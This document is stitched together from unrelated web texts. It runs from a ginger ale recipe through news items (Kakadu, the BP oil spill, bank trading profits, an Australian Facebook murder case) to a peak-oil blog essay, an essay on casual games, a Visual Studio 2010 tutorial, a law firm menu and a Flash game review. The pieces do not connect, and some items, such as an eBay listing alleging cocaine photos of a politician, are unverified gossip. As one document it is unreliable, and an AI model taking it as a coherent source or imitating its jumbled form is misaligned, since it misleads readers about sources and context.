1 cup chilled seltzer or club soda
Instructions –
1 . Put grated ginger in a bowl and stir in sugar .
Set aside for 30 minutes .
2 . Place a strainer over a cup .
Spoon the ginger / sugar mixture into the strainer and use the back of the spoon to press down on the ginger to extract ginger juice .
Discard left over ginger pulp .
3 . Stir lemon juice into ginger juice .
Stir in brown sugar and dissolve completely .
4 . Add seltzer or club soda and drink / serve immediately .
Homemade Ginger Ale Mix
~8 servings
1/2 cup grated ginger ( use a box grater )
4 teaspoons sugar
5 1/2 tablespoons freshly squeezed lemon juice
5 1/2 tablespoons light brown sugar
Instructions –
1 . Put grated ginger in a bowl and stir in sugar .
Set aside for 1 hour .
2 . Place a strainer over a cup or bowl .
Spoon the ginger / sugar mixture into the strainer and use the back of the spoon to press down on the ginger to extract ginger juice .
Discard left over ginger pulp .
3 . Stir lemon juice into ginger juice .
Stir in brown sugar and dissolve completely .
4 . Store the ginger mix in an airtight container in the fridge .
Use a few spoonfuls per cup of seltzer , adjusting to your own preference whenever you want a glass .
Try to use within 2 days .
posted by jessica at 11:32 AM
Filed under Drinks , Recipes .
You can follow any responses to this entry through the RSS 2.0 feed .
Both comments and pings are currently closed .
THE World Heritage - listed Kakadu National
Park will be expanded to include thousands of hectares of ecologically sensitive land that has uranium worth billions of dollars .
Aboriginal traditional owner Jeffrey Lee has offered the land to the federal government so it can become part of Kakadu , where he works as a ranger .
Djok Clan leader Jeffrey Lee , the sole custodian of the area known as Koongarra , has generously donated his ancestral lands to the nation to become part of Kakadu National Park , despite containing sizable reserves of Uranium .
Mr Lee , the sole member of the Djok clan and senior custodian of the land known as Koongarra , could have become one of Australia 's richest men if he had allowed the French energy giant Areva to extract 14,000 tonnes of uranium from its mineral lease in the area .
Mr Lee is an extremely shy and humble man who shuns publicity .
" I 'm not interested in money .
I 've got a job .
I can buy tucker ; I can go fishing and hunting .
That 's all that matters to me , " he told The Age in a rare interview in 2007 .
Roy Moore , candidate for governor of Alabama , wants you to know something about his opponent Bradley Byrne :
He once said that " evolution ... best explains the origins of life . "
Not only that , he thinks the Bible might not be 100 % true .
And you thought Tim James had this sewn up , what with his " Speak English or Die in a Car Crash " platform .
Via Wonkette , here 's Roy Moore 's attack ad aimed at crazy old evolution - believing Bradley Byrne :
[ via Wonkette ]
I 'm not a huge fan of video - based art .
But give this clip , likely by the same folks who made this clip , 20 seconds .
Then prepare for awesome .
The grand finale is near - transcendent .
[ TNW ]
Advertisement
" Casual " games have been all the rage in the games industry over the past few years .
From the explosive growth of online games to the major First - Party support of the Wii , the " casual gamer " and the entire supposed market space has become a great buzzword and mainstay in game development .
Entire divisions of large companies have cropped up solely around the idea of casual , and smaller companies and developers striking it rich in this wild west of an audience .
But seriously .
What does " casual " really mean ?
Of course anyone can point out games that are casual versus hardcore .
Wii Sports and Farmville are casual games , sure .
Call of Duty and World of Warcraft are not .
But what does that actually signify ?
And if you 're going to base independent or corporate projects and future sales figures on these genres , does n't it make sense to understand what they are and how they work ?
By using the Game Design Canvas , we can break down both casual and hardcore games and find out what really makes them tick .
When we contrast them as you 'll see in a moment , there are n't as many differences as one would assume .
However , one major difference betrays a casual game as a casual game , and that one difference influences the game 's audience , the viable platforms , sales methods , everything .
It is the difference that sets it apart from the hardcore titles and gives it its soul .
Common ( and Dangerous ) Misconceptions of " Casual "
There are many definitions that people have attempted and employed to understand what this casual hubbub is all about .
Even worse , some teams have forged ahead on their own casual titles without an understanding of what it actually means , leading to more than a few unsuccessful titles , where neither the hardcore audience nor casual audience alike have any interest .
Instead of realizing what makes a game fit for a casual audience , but rather just trying to emulate a hodgepodge of aspects of other casual titles , some developers have set themselves up for failure .
The following are the main misconceptions of what casual really means .
While there is a shred of truth in all of them , they still manage to miss the mark .
What we want is a bull 's eye of a definition that can guide our development decisions and help us understand our players .
Casual means easy .
This is by far the biggest red herring that throws many developers off .
After looking at many games like Wii Play , with their simple controls , easy levels of difficulty , and one sentence explanations , this is a quick conclusion to come to .
Looking at the games , back at the astronomical sales figures , and back again , many bewildered industry pros conclude that it must be due to the fact that the games are very easy to understand
This is a step in the right direction , but it 's not the whole story .
Making a game 's difficulty exceptionally easy does happen to have a high correlation with successful casual games , but being easy to play is a symptom of the real cause , not the cause itself .
Casual means family - friendly themes .
Another go - to explanation for the casual phenomenon is that casual games are just games without all the blood and guts and violence of most other titles .
They 're much brighter and happier , boasting child - like themes and whimsical environments .
Instead of destruction , the games ' stories focus on healing and nurturing .
The genres of the games also appear to be different ; eschewing medieval fantasy and science fiction , perhaps casual means that the games are more closely grounded in reality , such as golf or bowling .
Wii Sports Resort and Wii Fit speak to this .
Games that are closer to what a family might do together for fun must be what makes them casual , right ?
Again , not exactly .
This approach usually focuses too much on the game 's Aesthetic Layout .
Like being easy , most casual games happen have simple graphics , but does n't define the difference between casual and hardcore .
If you take a hardcore game and change the colors and the theme to be more family friendly , you are n't going to have a game ready for casual audiences .
The simple graphics are a result of the market that the game is targeting , not the cause .
Casual means ...dumb !
Some hardcore gamers ( and even some gaming press ) appear to have taken the definition of casual to mean " dumb " .
They do n't understand for a moment why in the world anyone would want to play such games when right down the block at your local GameStop you can pick up the gaming experience of the century in Modern Warfare 2 or Uncharted 2 .
Of course this is a conclusion one could only come to after a cursory examination , a failure to understand what 's really going on or why people could possibly be interested in something different .
The truth is that people are different , and that these hardcore players are not built and trained to enjoy casual video games .
Ironically , this violent gut response to casual games actually hints at the real cause better than the first two reasons , because it is based on the player 's skills .
The Tories were fortunate that none of the papers chose to lead on the Chris Grayling story on Monday .
If they had , David Cameron would be facing far more calls to sack his shadow home secretary .
But the party would be wrong to think that it had escaped from the row with no damage .
A new PinkNews poll of more than a thousand LGBT voters shows that support for the Tories has fallen sharply since Grayling 's gaffe and since Cameron 's flustered interview on gay rights .
The poll puts support for the Tories down 5 points to 20 per cent , with Labour unchanged on 28 per cent and the Lib Dems up 5 points to 29 per cent .
Under our electoral system , small swings such as this could hurt the Tories in just the sort of Lib Dem marginals they need to win to secure an overall majority .
Cameron is expected to mention gay people specifically in his first speech after the election is called , describing them as part of the " great ignored " .
That 's his way of telling his party : " No more gaffes like Grayling 's , please . "
PS : The Grayling story may not have been pursued hotly by the press , but it 's had a big impact on the web .
" Chris Grayling " is still trending on Twitter .
Follow the New Statesman team on Facebook .
Bruins general manager Peter Chiarelli has just announced that center Marc Savard has fully recovered from a concussion and has been cleared to play .
Chiarelli said Savard met with independent neurologist Dr. Jeremy Schmahamann and , in concert with the team medical staff , say the veteran is ready to join the Bruins for the second round of the playoffs .
Savard practiced with the Bruins Sunday , rejoining the team on the ice for the first time since suffering a Grade 2 concussion March 7 after a violent hit by the Penguins ’ Matt Cooke .
Savard , the club ’s top playmaker , scored 10 goals and added 21 assists in 41 games during the regular season .
Advertisement
There was some optimism yesterday after Savard participated in the team ’s optional morning skate before Game 6 of their playoff series with the Buffalo Sabres .
But he was ruled out even before the results of a neuro - psych test taken yesterday afternoon were available .
The Bruins closed out the Sabres with a 4 - 3 victory .
Chiarelli said that defenseman Mark Stuart ( infected left pinkie finger ) would not be available to play in the next round .
“ He is still a little bit aways away , ” said the GM .
“ I do n’t anticipate seeing him in this next round . ”
I know you ’re excited about being done with school and Glenn Beck speaking at your graduation and all …
But you should really double - check the spelling on the top of that graduation cap …
Especially before you put the picture up on the school ’s website .
Hilarious .
( via Kevin )
With the failure of the BP “ top kill ” maneuver , the effort to combat the BP oil spill is increasingly becoming an attempt to manage expectations .
A month ago , when the spill was barely a week old , Interior Secretary Ken Salazar told CNN that the “ ultimate relief ” – drilling a relief well – was still “ 90 days out . ”
Now , that pronouncement is looking like the most realistic target .
BP managing director Bob Dudley said Sunday that the the company 's best hope was not in capping the well but in containing and collecting the oil at the source until a relief well is ready in August .
IN PICTURES : Louisiana oil spill
" If we can contain the flow of oil and keep it out of the ocean , that 's not a bad outcome , " said Mr. Dudley on CNN 's " State of the Union , " noting that the next maneuver is to fit a new containment valve on the well .
After BP 's three unsuccessful attempts to stop or siphon the gushing oil , federal officials also appear to be shifting focus .
They are subtly but repeatedly emphasizing that their efforts should be judged by the region ’s long - term recovery – not on the immediate issue of whether they can stop the Macondo wellhead from leaking 800,000 gallons of oil a day into the Gulf of Mexico .
Addressing the situation in a statement Saturday , President Obama said : “ It is as enraging as it is heartbreaking , and we will not relent until this leak is contained , until the waters and shores are cleaned up , and until the people unjustly victimized by this manmade disaster are made whole . ”
As he states , Mr. Obama is not giving up on efforts to contain the leaking oil before the relief well is expected to be ready .
The problem is that BP – not the federal government – is best placed and equipped to stop the leak , yet the challenges presented by the Macondo wellhead are so great that BP might be unable to make much headway until August .
Some scientists have noted , without hyperbole , that it would be easier to launch a spacecraft to the moon than shut down the Macondo wellhead , which is 5,000 feet deep .
The “ top kill ” live feed offered a glimpse at this : robot submarines attempting precise maneuvers amid the crushing pressures of pitch - dark waters .
In his Saturday statement , Obama in some ways sounded as though he was in the midst of launching an ad hoc space program to the sea floor .
At a time when the nation is wanting him to give the aura of presidential power – that there is no solution beyond the scope of his administration – the statement instead cast him as the reluctant scientist , speaking of probabilities and technical challenges .
With “ the surest way to stop the flow of oil – the drilling of relief wells ” – needing “ several months to complete … engineers and experts have explored a variety of alternatives , ” Obama said .
“ While we initially received optimistic reports about the [ top kill ] procedure , it is now clear that it has not worked , ” he said , later adding : “ While we were hopeful that the ‘ top kill ’ would succeed , we were also mindful that there was a significant chance it would not . ”
So the Coast Guard directed BP to launch a new procedure , he said , “ which is not without risk and has never been attempted before at this depth … .
It will be difficult and will take several days ”
From here on , in fact , any new plans to contain or cap the well will be comparably riskier or less likely to work than “ top kill , ” which was seen as BP ’s best and most reliable option .
This is because BP tried the maneuvers it thought most promising first , culminating in the failed “ top kill ” effort .
The next attempt to stop the leak will involve cutting the riser pipe and fitting a new containment valve , called the lower marine riser package ( LMRP ) , atop it .
If the LMRP works , it could allow BP to collect all the oil leaking from the wellhead .
If it fails , it could increase the amount of oil leaking in the Gulf .
The riser pipe is kinked like a garden hose , and many scientists believe it is restricting the flow of oil somewhat .
Mr. Dudley countered Sunday that BP estimated that any increase in oil flow would be small .
With the prospect for containing the oil becoming progressively less likely with every mounting failure , Obama and his lieutenants are left to try to prepare Gulf coast residents for the worst without looking as though they have already accepted it .
The long - term federal relief effort , while unsatisfying to Gulf residents watching oil choke their coasts , is at least one area where the government can exercise control .
IN PICTURES : Louisiana oil spill
Related :
The knowledge that the present is unsustainable is , for many of us , a great emotional burden .
It troubles our sleep , our minds , and our basic emotional well - being .
Knowledge , like memory , cannot be erased at will , and thus it runs in the background of our lives , unseen by others but deeply troubling to the knower .
I am not alone in feeling this weight ; correspondents and readers write me that they feel it , too .
Yet it is not just the knowledge that all this is based on cheap , abundant oil and a rapidly imploding financial system based on fraud and lies that burdens us ; it is the mirror image of reality pressed upon us by the status quo : the Mainstream Media , the corrupt Savior State beholden to Power Elites and crony - capitalist , predatory monopoly - capital cartels and Global Corporate America ( which conveniently enough owns the mainstream media ) .
One of the most chilling stories to emerge from China 's Great Leap Forward in the late 1950s and early 60s -- in which peasants were instructed to " make steel " by melting down their metal farming and cooking tools , leaving them to starve in countless millions -- involves the artifices presented to Mao to cover up the grotesque consequences of his policies .
Communist party officials fearful of Mao's ire and losing their own perquisites arranged to have a specific route through the countryside planted thickly with rice .
Five meters deep on each side of this road , rice was planted so closely that it appeared to be the very acme of abundance ; the road was seemingly a thin ribbon of pavement cut through endless green abundance .
It was all artifice and lies .
While the officials pointed out the phony bounty to Mao , tens of millions of peasants were starving to death .
Behind the five meters of contrived abundance lay a barren landscape .
The American media and Savior State are busy planting their own five meters of apparent abundance and " growth " along every highway in the land .
The vast majority of people -- even people who should know better but who prefer not to know , and thus they studioudsly avoid peeking through the curtain of sham prosperity -- accept that GDP growth means something positive is happening in their own lives , even as the visible evidence points to a mirror - image of this " growth " propaganda .
We know that all the contrivances of " modern life " are ultimately the result of one single condition : cheap , abundant oil .
Everything -- the plays on Broadway , the film industry , the iPods made in China for cheap , the endless Mcmansions in gated exurbs , the grain - fattened , fat - marbled beef , the " cheap " fast - food meals , the Savior State and its Global Empire -- is all based on cheap , abundant oil .
There is no substitute in the near term .
Every " solution " fails to hold up beyond the most cursory examination .
Natural gas ?
Well , yes , but then all those " fracc'ed " wells the industry extols as the " solution " have a nasty habit of depleting rather quickly .
There are an an estimated 254.4 million vehicles in the U.S. ; would you care to guess the cost of converting them to natural gas ?
Will " entrepreneurship " re-make the distribution system to enable fueling those tens of millions of vehicles with natural gas ?
At what cost , and to whom ?
How about that " new discovery " of a 1 billion - barrel oil field in deep water ?
Does the MSM or Savior State propaganda ministry mention that 1 billion barrels is less than two months of U.S. consumption , or that it may take 5 years to extract the first drop , or that the costs of such deepwater drilling are so prohibitive that oil extracted will not be cheap ?
How about that " endless " shale oil ?
How many MSM stories note that production tops out at 2 million barrels a day , a mere 10 % of U.S. consumption -- and the Canadians and Chinese have claims on much of that production ?
Even a cursory read of this site , or others which peek through the thick green screen of State / corporate propaganda , reveals the multiple frauds at the very heart of American finance , governance , real estate and the stock market .
Yet most people do n't want to know .
They adamantly accept the mirror - image of reality presented by the media and State : that the economy is " growing " and fundamentally sound , even though the reality is the opposite ; that " reform " will fix the core problems , even though the reforms are simulacra designed to give the appearance of reform ; and that sickcare " reform " will lower costs even as the sickcare cartels increase their take of the economy every year .
This heavily promoted and contrived mirror - image disconnect between what we are told is true and what is actually true threatens us with a very draining madness .
Some readers donate money to this site because they say that it provides some sort of landing in a sea of lies , propaganda , misinformation and misprepresentation -- that in reading it they know they are not alone and that they are not crazy .
The unease and insecurity is very real .
None of us know the future ; we only know that the present is vastly unsustainable , and that if we as a nation and species rely on simulacra , artifice , lies , fraud and propaganda instead of reality , then the status quo will end very badly .
Any sane person who knows this finds it worrisome .
Hence the rational desire to hope for the best but prepare for the worst .
Yet many readers tell me they meet fierce resistance from those around them .
I understand completely ; I personally do not know a single person in my circle or neighborhood who has prepared for even a few days without the global supply chain -- and I live in " earthquake country " where a massive earthquake is not a possibility , it is a certainty ; the only missing bit of knowledge is " when . "
As one correspondent put it recently , most people have more dog food on hand than they do food for themselves .
I do n't advertise my own preparations , and I pass them off as " earthquake preparedness " as that strikes people as only slightly mad and paranoid rather than the full - blown madness of knowing the whole system is extremely vulnerable and precarious .
Very few people I know well have any savings to speak of either .
I have repeatedly suggested that they sell -- sell their second home , sell their office condo , sell anything and everything to reduce or eliminate their debt , but they persist in working themselves to death to pay the mortgages on their mini-real estate empire .
They all hope that the bubble will somehow magically reinflate , even though the possibility of that happening with 19 million vacant dwellings , rising interest rates and 5 million foreclosed homes in the pipeline is essentially zero .
Readers ask me for investment advice ; I cannot offer any , because I am not qualified to do so , nor do I care to do so ; the future is unknown to us all .
I can only say that I do n't trust the stock market or the propaganda , and so cash is King in my eyes , and whatever their drawbacks , gold and silver will not go to zero , while paper assets and even real estate can either go to near - zero or become a capital trap .
I do n't have a " cure " for this MSM - Savior - State induced madness , or the emotional burdens of knowing it is all interlocking dependencies supported by webs of lies and fraud , and thus is it really is " different this time , " but not in the way the shills , carnies and toadies think .
It does not have to turn out that badly ; we could get by on much less .
Half the energy in the nation is squandered , as is half the food produced from the fields .
If you visit any orchard in the land post - harvest , ton after ton of fruit lays wasted on the ground , rotting , in row after row , acre after acre , state after state .
The dumpsters are weighted down with the food we have thrown away , just as the air conditioners are running when nobody is even in the building .
A staggering 5 % of our electricity is wasted on zombie electronics on standby .
The list of waste is almost endless .
I have carried water to a garden in 5 - gallon buckets and gotten by on handfuls of beans and corn or brown rice , and been happy doing so .
Life does not end when the exurbs no longer make sense and the Savior State checks stop coming .
Our sense of reality has become so skewed , so riven with mirror images and marketing , that we have as a culture have lost touch with much more than " mere " reality .
It does n't have to end badly , but it might .
Power Elites desperate to maintain their perquisities have always found that fanning the winds of war distracts their citizenry from their own incompetence and greed .
So what is the solution ?
I do n't know ; nobody knows .
We only know our own limitations , and what we can do , however modest it might be .
We can turn off the TV , that is easily done and extremely helpful .
We can also limit our time online , as that is just another firehose of information which quickly overloads our sense of identity and proportion .
There are feedback loops in every system .
I know 2015 will not be like 2010 , but I cannot know precisely how it will be different .
I know 2020 will be very different from 2010 and 2015 , but I do n't know exactly how different ; nobody else knows , either .
All that we can do is to realize the carefully planted screen is only thick and abundant along the specified route , and that we owe it to ourselves to peek through to the barren terrain beyond , and to base our decisions and identity on that reality .
We cannot convince our loved ones , friends , family and associates ; in the odd moment , we can make a suggestion or leave a book for them to glance through .
That is all we can do ; the emotional burden we feel only gets heavier if we push too hard and create needless conflict .
So all we can do is make our own preparations as responsible individuals , as autonomous beings seeking liberty , and act accordingly .
Prudence is a good screen .
Having a bit of non-frozen food on hand is after all merely prudent , is n't it ?
And so are the rest : water filters , propane stoves , and so on .
Camping equipment is good to have on hand ; gardening is worthy exercise , and a nice hobby .
Eliminating fast food and packaged food from one 's diet is also merely prudent ; why poision ourselves if we have any sort of choice at all ?
Voting against every incumbent who has supported the bailouts of banking Elites , the fraudulent " reforms " and all the Savior State propaganda is also merely prudent ; why reward liars and thieves if there is any other choice available ?
Having savings is also prudent , as is eliminating debt .
Limiting our exposure to the lies , marketing and madness of Corporate - State media is also prudent .
So perhaps we can agree to be prudent , and perhaps others will accept it all as mere prudence .
On another topic : I will have houseguests this coming week , and then the rest of the month is already overbooked with non-online work .
As a result , I will be unable to answer email this month .
As you probably know , this blog and indeed the vast majority of blogs are labors of love .
There is no martyrdom in it ; we each choose to maintain a site for our own reasons , or in my case , because I can't help writing something every day ( even if it is of marginal value ) .
Nonetheless the reality is that my livelihood is earned elsewhere , in writing I do for money and other work in the non-digital world .
Some mornings I sit down to answer email and I look up 4 or 5 hours later , exhausted , and I have not yet caught up or made a penny toward my own modest expenses .
While I could set up an auto - respond , somehow that does n't appeal to me ; I would rather just tell you now , in a blanket way , that I learn so much from your emails -- links , personal accounts , book suggestions and much more -- that I do not want to discourage this free flow of meaningful information , even as I must confess I have severe limits on my time and energy and yes , emotional strength .
So in all honesty I must reluctantly tell you that while I will read every email I receive this month , I can not respond to them .
I can only thank you now for taking the time to share informaton with me , before the deluge of real - world work hits .
I would also like to thank everyone who makes their Amazon purchases through this site .
It is a way of ( in essence ) donating a small but welcome amount of money to the site without having to pay the donation out of pocket -- the small commission Amazon pays is paid out of their revenue ; the buyer pays no more than they would if they made the purchase directly from Amazon .
Last month someone very kindly purchased their Kindle through oftwominds.com ; that was very generous and I thank that unknown reader for their thoughtful donation via the small commission paid by Amazon .
Lastly , I would like to thank every reader who kindly bought a copy of my book Survival + : Structuring Prosperity for Yourself and the Nation and / or Survival +
The Primer .
As a self - published author the odds are long indeed , and your support means a lot to me .
Thank you for your continued readership and your understanding of my frailties and limits .
JPMorgan said that its trading revenue hit $ 90 million on 39 days during the first quarter , and exceeded $ 180 million on nine days , or about 14 percent of the time .
A JPMorgan spokesman said the last time the bank had a perfect run was the first quarter of 2003 .
“ The high level of trading and securities gains in the first quarter of 2010 is not likely to continue throughout 2010 , ” Morgan said in a regular filing with the Securities and Exchange Commission this week .
Goldman Sachs — which is fighting an S.E.C. suit claiming the bank defrauded customers on a complex mortgage investment — posted its first perfect quarter ever .
Goldman made at least $ 100 million on 35 days during the quarter , and at least $ 25 million on the remaining trading days .
In the wake of the S.E.C. suit , Goldman ’s role as a market maker has come under scrutiny on Capitol Hill .
It has staunchly defended its business practices and said it had done nothing wrong .
Gary D. Cohn , Goldman ’s president , said Tuesday that the standout quarter highlighted the strength of the trading that Goldman executed for its customers , particularly its fixed income , currency and commodities unit , known as FICC .
“ Our FICC and equities businesses are largely global market - making businesses where we intermediate flows and commit capital and liquidity and in the process generate revenue including bid - offer spreads , ” Mr. Cohn said at a UBS conference in New York .
“ These franchises create numerous opportunities for the firm . ”
Citigroup also had a loss - free first quarter , according to a person briefed on the situation .
The bank discloses its trading performance on an annual basis , but big daily losses have been a regular occurrence over the last few years .
In 2008 , it lost $ 400 million on 21 of its 260 trading days .
This year , even those that lost money from time to time , performed very well during the quarter .
Morgan Stanley said its losses reached as much as $ 30 million only four days in an otherwise profitable quarter .
A Morgan Stanley spokesman said the firm ’s last perfect run was the second quarter of 2007 .
[ tweetmeme source= ” aabdulmoniem ” only_single=false ]
Older versions of VS like 2003 and 2005 were dedicated to only one framework .
This was annoying because you have to use multiple versions of VS to develop multi-target applications which was n’t very feasible at this time !
VS 2008 had come with a great feature called Multi- Target support which enables developers to develop multi-target applications on the same IDE .
So , I can develop a program under .
NET 2.0 and using the same VS to develop another one with .
NET 3.5 or even convert the old one to .NET 3.5 .
Great feature , huh !
The problem was that all these versions will run on the same CLR , they are only different in class libraries !
So , VS 2008 was primarily focused on filtering the different assemblies and project templates according the developer ’s framework choice but everything else was working on the same CLR like compiling and debugging for example .
This was n’t perfect because the intellisense of VS 2008 always showing the libraries of .
NET 3.5 even if you are using .
NET 2.0 !
This makes the chance that developers using .
NET 2.0 adding code snippets which is supported only in .NET 3.5 by accident .
VS 2010 comes to the rescue .
Now you can develop many programs under many different frameworks safely because the intellisense has been improved to show only what your framework supports .
Enough talking let ’s see some screen shots .
Just I will create two different web applications targeting different frameworks .
The first one will target .
NET 2.0 :
And the second one will target .
NET 4.0 :
Now we have two web applications in our Solution Explorer :
Now let ’s examine some differences , as we see DotNet2 project is the startup one so we will just run the page and open the integrated server information of VS 2010 to see the following :
But when we mark DotNet4 project as the startup one and run it you will see a different server information :
As you saw the difference is a clean separation between old CLR and new CLR .
Good shot !
Let ’s see another difference while working with VS Toolbox .
We will just open the default page of the DotNet2 web application and open the VS ToolBox data tab to see what the supported controls are in ASP .
NET 2.0 :
And for the DotNet4 project , we will a different control list :
As we can see that VS 2010 now filters the tool box to show different controls according to the targeted .NET framework .
Amazing !
Another one is , the property grid .
Let ’s see what is the difference .
Drag a button on the default page for both projects and let ’s see what the property grid will show .
In DotNet2 project :
And for DotNet4 project :
As we can see , VS 2010 filters the properties which are supported in each framework correctly .
Nice !
Last one , is the Intellisense which we have talked about firstly .
Let ’s try to write a statement like ( Response .
Re ) in the two projects and let ’s see what is the difference .
In DotNet2 project :
And in DotNet4 project :
As we can see , VS 2010 filters the methods and properties which are supported in the targeted framework automatically for you to prevent to from accidentally writing something not appropriate .
A very good addition to this new version VS 2010 .
“ I do not accept the manner in which insurance companies intend to treat you because I believe that you deserve extraordinary care when your livelihood is on the line . ”
— Main Menu — Home Firm Overview Practice Areas - Practice Areas Overview - Legal Malpractice - - Legal Malpractice Overview - - From the Desk of Scott Stewart - - - Thoughts on Legal Malpractice Cases - - - Legal Malpractice : Dismissing a Case That Cannot be Dismissed - - - 03-03-2012 Considerations Prior to Handling a Legal Malpractice Claim – Seminar Outline - - - Legal Malpractice : What to do When Your Lawyer Wants You to Accept a Settlement That You do not Want to Take ? - - Legal Malpractice in Business Dispute Cases - - Legal Malpractice in Personal Injury Cases - - Legal Malpractice in Investor Fraud Cases - Personal Injury - - Personal Injury Overview - - Personal Injury FAQs – Frequently Asked Questions - Insurance Bad Faith Claims - - Insurance Bad Faith Claims Overview - - From the Desk of Scott Stewart – Bad Faith Duty to Defend - - Insurance Bad Faith Information - Social Security Disability - - Social Security Disability Overview - - Social Security Disability Help Center - Workers ’ Compensation - - Workers ’ Compensation Overview - - Workers ’ Compensation FAQs – Frequently Asked Questions - - Wokers ’ Compensation Glossary of Terms - - Workers ’ Compensation Laws & Regulations - - Ohio BWC Forms Attorneys - Our Attorneys – Past and Present - Scott E. Stewart - - Scott E. Stewart - - From the Desk of Scott Stewart - - - Scott Stewart Practice Overview - - - Thoughts on Legal Malpractice Cases - - - Legal Malpractice : Dismissing a Case That Cannot be Dismissed - - - 03-03-2012 – Legal Malpractice Seminar - - - Legal Malpractice : What to do When Your Lawyer Wants You to Accept a Settlement That You do not Want to Take ? - - - Bad Faith : Failure to Attend - - - Recognized in Cleveland ’s Best Lawyers 2012 Publication - - - National Business Institute Speaking Engagement : 06-26-3013 - Lawrence E. Stewart ( 1925 -2013 ) - Thomas H. DeChant ( 1932 -2013 ) Resources - Resources - Ohio County and Municipal Courts Contact
The condescension rained on Angela Merkel 's unilateral clampdown on speculators is misplaced .
The German chancellor is not naive about the workings of capitalism – she knows that democratically elected leaders are locked in a power struggle with financial markets over how the debt crisis is resolved , and on what timetable .
Speculators are amoral and their tunnel vision goes no further than financial gain .
They have no interest in the wider body politic , but the side effect of their actions can be to usurp the prerogative of governments , forcing them to take more draconian actions than they would wish .
It is true that speculators exploit genuine flaws , but they can wreak their own havoc by magnifying and accelerating events , inflicting more pain on innocent citizens in the process : just ask any Greek facing austerity measures .
They create emergencies , when measured progressive and united responses to complex problems would be far better .
The credit default swaps holding eurozone governments hostage are opaque , unregulated and ripe for reform .
A ban on naked short - selling is not the unprecedented , unworkable lunacy Merkel 's detractors would have you believe .
Hong Kong made it a criminal offence in the wake of the Asian crisis in the late 1990s , and officials there believe this has been helpful in the current crisis .
Despite the discrediting of the financial sector , a belief persists that markets are all - powerful .
But allowing a free rein to speculators subverts democracy .
We may sometimes despair of our leaders but it cannot be right that they are trampled by unaccountable and unelected traders , acting purely for their own profit and with no thought for the wider social good .
Merkel was foolhardy to act alone – and the fact she went freelance at a time when unity in the eurozone is desperately needed is alarming in itself – but her instinct that the markets must be tamed is entirely correct .
This is a battle that governments cannot afford to lose .
The characteristics of a Jack Kirby illustration are easily distinguished : extravagantly costumed heroes and nefarious villains locked in titanic struggles ; foreshortened fists , feet and muscles that seem to pop off the page ; intricately detailed settings meant to conjure the ancient past or suggest the distant future .
His style made Mr. Kirby a sought - after talent at DC Comics , now a piece of the Time Warner empire , and at Marvel Comics , a recent acquisition of the Walt Disney Company .
At Marvel in particular he played a crucial role in creating superheroes like the Fantastic Four , the Hulk and the X - Men  work that is now at the center of a property dispute between the heirs of Mr. Kirby , who died in 1994 , and Marvel and Disney .
Those same signature design elements are also vividly on display in hundreds of illustrations for never - produced cartoon shows and toy lines that Mr. Kirby created in the 1980s for the animation studio Ruby - Spears Productions  work that thus far does not belong to any of the media conglomerates and that has been seen by few people .
Image “ Roxie / Bad Guys ” by Jack Kirby , who created a number of characters in the 1980s that have yet to come to light .
Credit ...
Jack Kirby / Ruby - Spears Productions
Now , a partnership between that studio ’s founders , Joe Ruby and Ken Spears , and Sid and Marty Krofft , the longtime children ’s entertainment producers ( “ H. R. Pufnstuf , ” “ Land of the Lost ” ) , is planning to revive these unseen Kirby characters in as many forms as possible .
It ’s a proposition that faces challenges as the studios scour the landscape for the next comic book or cartoon character they can transform into a franchise , but also one that has piqued the interest of some powerful Hollywood players .
The indie scene has been overrun in recent years with games that play with time travel , in particular using that gimmick as an excuse to have multiple copies of the player character on screen simultaneously .
Blame Braid , I suppose , although clones were used only sparingly in Jonathan Blow 's breakout hit in 2008 .
That said , there 's something refreshing about Time Paradox , an amateur Flash game submitted to the Game Brain contest on the Square Enix website .
In Time Paradox you have a mere 30 seconds to reach an exit blocked by locked doors .
There 's never enough time to unlock all the doors yourself , but by stepping into a time machine you can reset the clock and work with your past self to escape .
The catch is this :
Unlike all those other time travel clone games , you must not encounter your past self at all .
Even looking him in the eye will cause you both to " faint " and create a time paradox , resetting the stage .
There 's even a horrible little scream that plays when you fail , one that is at odds with the cutesy retro graphics .
Time Paradox has an old - fashioned look to it , one that reminds me of Half - Minute Hero – which come to think of it also has a 30 second time limit .
Unfortunately , the game is also very much old - fashioned in its design .
There 's no pause or mute button ( rather unusual for a Flash game ) and you are limited to three lives .
You can continue from the title screen , sure , but the unnecessary Game Over screen is pure tedium .
I also found the controls to be oddly unresponsive at times , though that could be a limitation of my PC or my web browser .
My hope is that someone out there will pick up on the good ideas this game has and put them to use in a better game .
Time travel is scary stuff ; more games should reflect that .
Screengrab : Daniel Feit / Wired.com
Time Paradox [ Square Enix , via AV Club ]
Available on Ebay : " PICS of FL GOV CHARLIE CRIST snorting lines of COCAINE ! " Somewhere " between 2 and 6 readily identifiable pictures " of ol ' independent Charlie doing blow in the 80s .
Starting bid $ 600,000 .
[ And a nice Charlie Crist painting ! ]
Australian girl , 18 , 'lured to her death by bogus job offer from man she met on Facebook '
An Australian teenager was allegedly lured to her death by a man she met on Facebook after he offered her a fake job protecting wildlife .
Nona Belomesoff , 18 , was found dead in a creek south west of Sydney after going to meet a Facebook ' friend ' .
Christopher Dannewig , 20 , allegedly set up a bogus profile to pose as an animal rescue worker and enticed his victim to the isolated spot .
Nona , who is described as a animal lover , was told she first had to go on an overnight camping trip that would be part of her initial training for the post .
Murder charges : Nona Belomesoff , left , was found dead in a creek south west of Sydney , after she allegedly met Christopher Dannveig , right , pictured on his Facebook page , who had promised her a job
Filled with excitement , she headed off to a railway station to meet ' Jason Green ' - the fake identity allegedly set up by Dannewig .
The teenager told her family , who also believed the offer was genuine .
Her body was found on Friday night after she failed to return home .
Dannewig , who also has profiles on My Space and Bebo , was charged with murder yesterday and was refused bail after appearing in court .
Police issued a fresh warning to parents to monitor their children 's internet habits .
Homicide Squad detective inspector Russell Oxford warned about the dangers of Facebook and other social networking sites .
' It 's an area where predators and perverts and other people just get onto .
You just do n't know who you could be talking to , ' he said .
' This young woman had a passion for animals and was led to believe the overnight camping trip would lead to a potential job with an animal welfare group , ' Inspector Oxford said .
' She told her family and they thought it was a genuine training area she was going to .
That was part of the story to encourage her to go out there .
' And it was n't until later on that we found out there is no such training facility like that and the people are n't affiliated with that place , so it was a bogus ruse to get her out there . '
Nearly 30 police officers searched bushland before the teenager 's body was found in the Campbelltown creek , although her cause of death has not been revealed .
Inspector Oxford said : ' It is heart - wrenching .
We have all got kids that age .
I have kids that age myself .
' I have been doing this for a long time , but we 're very upset .
To go outside in the dark and find a young girl lying in the creek bed ...'
Comments her accused killer , Christopher Dannevig , wrote on social networking sites hinted at a troubled life .
